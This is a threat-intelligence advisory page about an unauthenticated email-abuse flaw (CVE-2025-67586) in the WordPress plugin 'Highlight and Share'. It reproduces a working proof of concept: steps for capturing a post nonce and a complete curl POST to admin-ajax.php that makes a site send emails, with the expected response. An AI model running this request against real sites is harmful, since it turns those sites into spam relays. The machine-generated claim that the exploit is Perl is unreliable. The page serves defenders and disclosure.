WordPress Plugin 5.2.0 - Broken Access Control
A broken access control vulnerability exists in the WordPress plugin 'Highlight and Share' version 5. 2. 0 and earlier. The vulnerability allows unauthenticated attackers to abuse the 'Share via Email' AJAX functionality by reusing a valid post nonce to send unauthorized emails. This can lead to email spam or abuse without requiring user authentication. The exploit requires no privileges and can be executed by capturing a valid nonce from a public post and then sending crafted POST requests to the plugin's AJAX endpoint. No official patch or vendor advisory is provided in the available data.
AI Analysis
Technical Summary
The WordPress plugin 'Highlight and Share' (version 5.2.0 and earlier) contains a broken access control vulnerability (CVE-2025-67586) in its AJAX 'Share via Email' feature. An unauthenticated attacker can reuse a valid post nonce obtained from a public post to trigger email sharing requests without proper permission checks. This allows unauthorized sending of emails through the plugin's functionality, potentially enabling email spam or abuse. The vulnerability requires no authentication or privileges and is demonstrated with a proof-of-concept exploit using curl commands. The exploit code is written in Perl. No patch or official vendor advisory is currently available.
Potential Impact
The vulnerability enables unauthenticated attackers to send emails via the affected WordPress plugin without authorization. This can result in abuse such as spam emails being sent from the vulnerable site, potentially damaging the site's reputation and causing operational issues. There is no indication of direct compromise of site data or code execution from the provided information.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch is available, site administrators should consider disabling or restricting the affected plugin's email sharing functionality or implementing additional access controls to prevent unauthenticated abuse. Monitoring for unusual email activity related to the plugin is also advisable.
Indicators of Compromise
- exploit-code: # Exploit Title: WordPress Plugin 5.2.0 - Broken Access Control # Date: 2025-09-20 # Exploit Author: Zeeshan Haider # Vendor Homepage: https://wordpress.org/plugins/ # Software Link: https://wordpress.org/plugins/highlight-and-share/ # Version: <= 5.2.0 (REQUIRED) # Tested on: WordPress 6.x, Kali Linux # CVE: CVE-2025-67586 ==> Description A broken access control vulnerability exists in a WordPress plugin developed by DLX Plugins. The plugin exposes an unauthenticated AJAX action that allows attackers to abuse the "Share via Email" functionality without proper permission checks. An unauthenticated attacker can reuse a valid post nonce to trigger email sharing requests, leading to unauthorized email sending (email spam / abuse) without user authentication. ==> Privileges Required None (Unauthenticated) ==> Proof of Concept (PoC) > Step 1: Pick website with Installed Plugin > Step 2: Obtain a Valid Nonce 1. Open a public post. 2. Highlight text and click **Share via Email**. 3. Open Developer Tools → Network → XHR. 4. Send the email once. 5. Capture the request containing: action=has_email_social_modal nonce=<NONCE> post_id=<POSTID> Step 3: Exploit via Unauthenticated Request > bash cmd: (replace website URL, post URL, and nonce) curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php' \ -d 'action=has_email_form_submission' \ -d 'formData[postId]=<POSTID>' \ -d 'formData[permalink]=http://localhost/?p=<POSTID>' \ -d 'formData[nonce]=<NONCE>' \ -d 'formData[toEmail]=attacker@example.com' \ -d 'formData[subject]=PoC' \ -d 'formData[shareText]=POC test' \ -d 'formData[emailShareType]=selection' \ --compressed --> Expected JSON response: { "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with attacker@example.com", "message_subject": "[Shared Post] <POST TITLE>", "message_source_name": "Site Name", "message_source_email": "site@example.com" } }
WordPress Plugin 5.2.0 - Broken Access Control
Description
A broken access control vulnerability exists in the WordPress plugin 'Highlight and Share' version 5. 2. 0 and earlier. The vulnerability allows unauthenticated attackers to abuse the 'Share via Email' AJAX functionality by reusing a valid post nonce to send unauthorized emails. This can lead to email spam or abuse without requiring user authentication. The exploit requires no privileges and can be executed by capturing a valid nonce from a public post and then sending crafted POST requests to the plugin's AJAX endpoint. No official patch or vendor advisory is provided in the available data.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The WordPress plugin 'Highlight and Share' (version 5.2.0 and earlier) contains a broken access control vulnerability (CVE-2025-67586) in its AJAX 'Share via Email' feature. An unauthenticated attacker can reuse a valid post nonce obtained from a public post to trigger email sharing requests without proper permission checks. This allows unauthorized sending of emails through the plugin's functionality, potentially enabling email spam or abuse. The vulnerability requires no authentication or privileges and is demonstrated with a proof-of-concept exploit using curl commands. The exploit code is written in Perl. No patch or official vendor advisory is currently available.
Potential Impact
The vulnerability enables unauthenticated attackers to send emails via the affected WordPress plugin without authorization. This can result in abuse such as spam emails being sent from the vulnerable site, potentially damaging the site's reputation and causing operational issues. There is no indication of direct compromise of site data or code execution from the provided information.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch is available, site administrators should consider disabling or restricting the affected plugin's email sharing functionality or implementing additional access controls to prevent unauthenticated abuse. Monitoring for unusual email activity related to the plugin is also advisable.
Technical Details
- Edb Id
- 52511
- Has Exploit Code
- true
- Code Language
- perl
Indicators of Compromise
Exploit Source Code
Exploit code for WordPress Plugin 5.2.0 - Broken Access Control
# Exploit Title: WordPress Plugin 5.2.0 - Broken Access Control # Date: 2025-09-20 # Exploit Author: Zeeshan Haider # Vendor Homepage: https://wordpress.org/plugins/ # Software Link: https://wordpress.org/plugins/highlight-and-share/ # Version: <= 5.2.0 (REQUIRED) # Tested on: WordPress 6.x, Kali Linux # CVE: CVE-2025-67586 ==> Description A broken access control vulnerability exists in a WordPress plugin developed by DLX Plugins. The plugin exposes an unauthenticated AJAX action that allows at... (1494 more characters)
Threat ID: 69ec2f5087115cfb68b9e9d7
Added to database: 4/25/2026, 3:04:48 AM
Last enriched: 4/25/2026, 3:04:59 AM
Last updated: 4/25/2026, 8:25:09 AM
Views: 7
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.